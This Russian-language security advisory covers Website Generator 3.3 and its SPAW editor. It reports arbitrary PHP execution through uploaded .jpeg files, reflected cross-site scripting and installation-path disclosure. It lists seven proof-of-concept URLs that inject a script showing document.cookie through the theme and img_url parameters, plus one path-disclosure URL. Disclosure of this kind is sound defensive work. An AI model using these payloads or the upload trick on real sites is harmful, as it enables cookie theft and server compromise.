Программа: Website Generator 3.3
Обнаруженная уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольный PHP сценарий на целевой системе.
Удаленный пользователь может загрузить файл с расширением .jpeg, содержащий PHP код и затем выполнить его на целевой системе.
Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Примеры:
http://[target]/[path]/spaw/img_popup.php?img_url=" %20border="0"/><script>alert(document.cookie)</script>
http://[target]/[path]/spaw/dialogs/colo rpicker.php? theme="><body><script>alert(document.cookie)</script>
http://[target]/[path]/spaw/dialogs/table.php?theme="> < body><script>alert(document.cookie)</script>
http://[target]/[path]/spaw/dialogs/td.php?theme="> < body><script>alert(document.cookie)</script>
http://[target]/[path]/spaw/dialogs/confirm.php?theme="> < body><script>aler t(document.cookie)</script>
http://[target]/[path]/spaw/dialogs/a.php?theme="> < body><script>alert(document.cookie)</script>
http://[target]/[path]/spaw/dialogs/banner_l ibrary.php? theme="><body><script>alert(document.cookie)</script>
Удаленный пользователь может получить данные об установочной директории приложения на сервере с помощью специально сформированного URL.
Пример:
http://[target]/[path]/spaw/spaw_control.class.php